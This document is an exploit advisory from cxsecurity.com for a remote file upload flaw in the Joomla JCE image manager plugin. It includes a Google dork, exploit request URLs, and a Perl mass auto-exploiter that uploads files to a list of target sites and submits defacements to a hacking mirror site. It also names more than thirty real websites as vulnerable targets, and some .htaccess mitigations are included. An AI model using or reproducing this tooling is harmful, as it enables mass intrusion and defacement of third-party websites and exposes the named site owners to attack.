Joomla JCE 2.6.33 Arbitrary Insert File Vulnerability

2018.12.02
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

################################################################################# # Exploit Title : Joomla Content Editor JCE com_jce Components Image Manager Plugin 2.6.33 Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Vulnerability Published Date : 30/11/2018 # Vulnerability First Discovered Date : 10/03/2014 # Vendor Homepage : joomlacontenteditor.net # Software Download Links : joomlacontenteditor.net/downloads / + extensions.joomla.org/extension/jce/ ~ joomlacontenteditor.net/downloads/editor/core ~ + joomlacontenteditor.net/downloads/editor/core/9 + JCE 2.6.33 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element= f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266 + JCE 2.6.7.1 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id= 1255&element=f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=547c7217f6fad641a91db0b982dd72b6 # Version Information : From JCE 2.6.7.1 to JCE 2.6.33 All Versions are affected. + Installation package for Joomla! 2.5 & 3.x - Previous Versions before 2.x are not affected. # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : High # Google Dorks => inurl:''/index.php?option=com_jce'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] ############################################################################################## ++++++++++++ Extended Exploit and Vulnerability Information Reference Links +++++++++++++ # CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018050200 # Exploit4Arab Exploit Link : exploit4arab.org/exploits/2118 # ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=29762 # SecurityNewsWire Exploit Link : securitynewswire.com/latestsecuritynews/mobile_article.php?title= Joomla_Content_Editor_JCE_ImageManager_Vulnerability_Mass_Auto_Exploiter # Reddit Exploit Link : : reddit.com/r/phpAdvisories/comments/8lzi1t/joomla_content_editor_jce_imagemanager/ # HackerTor Exploit Link : hackertor.com/2018/05/24/joomla-content-editor-jce-imagemanager-vulnerability-mass-auto-exploiter/ # PhpSecure Exploit Link : phpsecure.info/go/163420.html # Cyberizm Exploit Link : cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html ############################################################################################## Original Exploit Title : Joomla Content Editor JCE Image Manager Plugin 2.6.33 Remote File Upload Vulnerability and Mass Autor Exploiter Perl ############################################################################################## # Description of the Product => JCE makes creating and editing Joomla!® content easy... Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS... Office-like functions and familiar buttons make formatting simple Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface Create Links to Categories, Articles, Weblinks and Contacts in your site using a unique and practical Link Browser Easily tab between WYSIWYG, Code and Preview modes. Create Tables, edit Styles, format text and more... Integrated Spellchecking using your browser's Spellchecker Fine-grained control over the editor layout and features with Editor Profiles Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®, Windows Media Player® and HTML 5 Video and Audio. Easily insert Youtube and Vimeo videos - just paste in the URL and Insert! Insert HTML5 Video and Audio with multiple source options Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor Insert multiple images. Create responsive images with the srcset attribute Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension Filemanager => Create links to images, documents, media and other common file types Include a file type icon, file size and modified date Insert as a link or embed the document with an iframe Create downloadable files using the download attribute. Template Manager => Insert pre-defined template content form html or text files Create template snippet files from whole articles or selected content Configure the Template Manager to set the startup content of new articles ############################################################################################## Outdated versions of the Joomla extension JCE contain a very serious security vulnerability that allows a hacker to upload files remotely to a website. You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed. [ % 40 or more ] Use your brain. Explanation for Joomla Content Editor JCE => [ ScreenShot from Administrator Control Panel ] => cdn.pbrd.co/images/Hmx6KZC.jpg ~ cdn.pbrd.co/images/HmypA0v.png Note : This Joomla JCE is not the previous exploit going to this path => ..../images/stories/......php => NO Previous Version Exploit Link => bugreport.ir/78/exploit.htm => This doesn't work for this vulnerability. Notes => Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg This exploit have no path : We don't need any username and pass for bypassing the admin panel. There is a little trick here. TARGETSİTE/yourfilename.png .gif .jpg or TARGETSİTE/images/yourfilename.html => YES .php .asp .jpg .gif .png => ############################################################################################## Install JCE Editor in Joomla! 2.5 Tutorial [video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video] Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial [video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video] How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability [video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video] ############################################################################################## Solution for this Security Issue => Add .htaccess file in /images/ and for /public_html/ homepage folder that disallows any scripts to be run. Put this in your .htaccess file: AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi .exe .png .jpg .gif .txt .html .htm Options -ExecCGI that makes it so scripts of those extensions are not allowed to run, and will generate a FORBIDDEN error if tried. Another thing to consider in the .htaccess, is something like this: RewriteEngine on RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http://(.+\.)?yourwebsite.com/.*$ [NC] RewriteRule \.(gif|jpg|png)$ - [F] The above will not allow anyone to view the images unless they are viewing them as content on "yourwebsite.com". This stops people from linking your images. Or you can try this => 1. add the following .htaccess into ./images/.htaccess folder to prevent php shell running ##################### Options -Indexes php_flag engine 0 RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml .gif .png .jpg .txt AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml .gif .png .jpg .txt ##################### 2. deny access to /tmp folder by adding ./tmp/.htaccess with the following content ##################### deny from all ##################### ############################################################################################## You can check with this exploit codes on your browser if the sites are vulnerable for testing the security. So you will see some errors. For Exploiting the Sites - use Auto Mass Exploiter Perl. Exploit => /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 {"result":{"error":true,"result":""},"error":null} Exploit => /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":null,"error":"No function call specified!"} Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":null,"error":"No function call specified!"} Directory File Path => TARGETSİTE/yourfilename.png or TARGETSİTE/images/yourfilename.png ############################################################################################## Joomla JCE Image Manager Auto Mass Exploiter Perl => #!/usr/bin/perl use Term::ANSIColor; use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common qw(POST); $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"); $ua->timeout (10); system('title Joomla JCE All Versions Mass Auto Exploiter Perl by KingSkrupellos'); print "JCE Mass Auto Exploiter\n"; print "Coded by KingSkrupellos\n"; print "Cyberizm Digital Security Team\n"; print "Please Give WebSites List Here:"; my $list=<STDIN>; chomp($list); open (THETARGET, "<$list") || die ">>>WebSite cannot be open. Wrong URL Link<<< !"; @TARGETS = <THETARGET>; close THETARGET; $link=$#TARGETS + 1; foreach $site(@TARGETS){ chomp $site; if($site !~ /http:\/\//) { $site = "http://$site/"; }; $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"; print "wait upload $site\n"; $vulnurl=$site.$exploiturl; $res = $ua->get($vulnurl)->content; if ($res =~ m/No function call specified!/i){ open(save, '>>C:\Users\YOURNAMEHERE\KingSkrupellos\result\list.txt'); print "\n[Uploading]"; my $res = $ua->post($vulnurl, Content_Type => 'form-data', Content => [ 'upload-dir' => './../../', 'upload-overwrite' => 0, 'Filedata' => ["kingskrupellos.png"], 'action' => 'upload' ] )->decoded_content; if ($res =~ m/"error":false/i){ }else{ print " ......... "; print color('bold white'); print "["; print color('reset'); print color('bold green'); print "PATCHED"; print color('reset'); print color('bold white'); print "] \n"; print color('reset'); } $remote = IO::Socket::INET->new( Proto=> PeerAddr=>"$site", PeerPort=> Timeout=> ); $def= "$site/kingskrupellos.png"; print colored ("[+]Successfully Exploited",'white on_red'),"\n"; print "$site/kingskrupellos.png\n"; }else{ print colored (">>Exploit Don't Work. Wrong URL Link. Not Vulnerable.<<",'white on_blue'),"\n"; } } sub zonpost{ $req = HTTP::Request->new(GET=>$link); $useragent = LWP::UserAgent->new(); $response = $useragent->request($req); $ar = $response->content; if ($ar =~ /Hacked By KingSkrupellos/){ $dmn= $link; $def="KingSkrupellos"; $zn="http://aljyyosh.org/single.php"; $lwp=LWP::UserAgent->new; $res=$lwp -> post($zn,[ 'defacer' => $def, 'domain1' => $dmn, 'hackmode' => '15', 'reason' => '1', 'Gönder' => 'Send', ]); if ($res->content =~ /color="red">(.*)<\/font><\/li>/) { print colored ("[-]Send WebSites to Mirror $1",'white on_green'),"\n"; } else { print colored ("[-]Error Has Occured",'black on_white'),"\n"; } }else{ print" Zone Could'nt be Taken From Aljyyosh!! \n"; } } ############################################################################################## # Usage Explained => Download XAMPP for your Operating System => apachefriends.org/download.html XAMPP for Windows 5.6.38, 7.0.32, 7.1.24 & 7.2.12 XAMPP for Linux 5.6.38, 7.0.32, 7.1.24 & 7.2.12 XAMPP for OS X 5.6.38, 7.0.32, 7.1.24, 7.2.12, XAMPP-VM & XAMPP-VM How to use this code perl on your operating system like Windows ; [ You can run this code also for Linux OS, too. ] Open Start + Go to Search Button + Type + Command Prompt => or cmd.exe Or you can use ConEmulator for Windows => conemu.github.io => Download it and use it. Create a folder like " jcee " in your Desktop and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt C:/Users/Your-Computer-Name/ cd Desktop cd "jcee" perl yourexploitcodenamejce.pl site.txt Waiting for Upload Exploit Successful or Not Finished ############################################################################################## Example Vulnerable Sites => [ More on Search Engines like Google - Yahoo - Bing and others etc.. - Use your Brain... ] abcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":{"error":true,"result":""},"error":null} sv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} http://www.mocollc.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} sisdesign.com.br/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} horizonclimatecontrols.ca/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} living-anatomy.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} vera-karelli.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} noatrans.fr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} vietthiphotography.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} franciscoqueiroz.com.br/portal/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} dessupoiu.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} restoran-tamada.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} elsonllc.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} aidem.in/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} ruralsouthtexasedc.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} parbutaranfurniture.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} anhadesigns.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} heartofasportsman.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} sv-langwedel.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} laboratoriodellarte.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} wagadu-jikke.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} lasolida.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} premiorenatofucini.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} poliambulatoriolattanzi.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} specialitainvetrina.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} comune.scalea.cs.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} cavambrosiano.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} fratellidisoledad.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} vitaminasport.bg/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} personnalisationcarte.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} taxi3305050.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} studioconsulenzasportiva.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} misericordiamontalto.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} THE END ############################################################################################## Author is not responsible for any damage of the websites. This Article has been written with the purpose of education. ############################################################################################## Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ##############################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top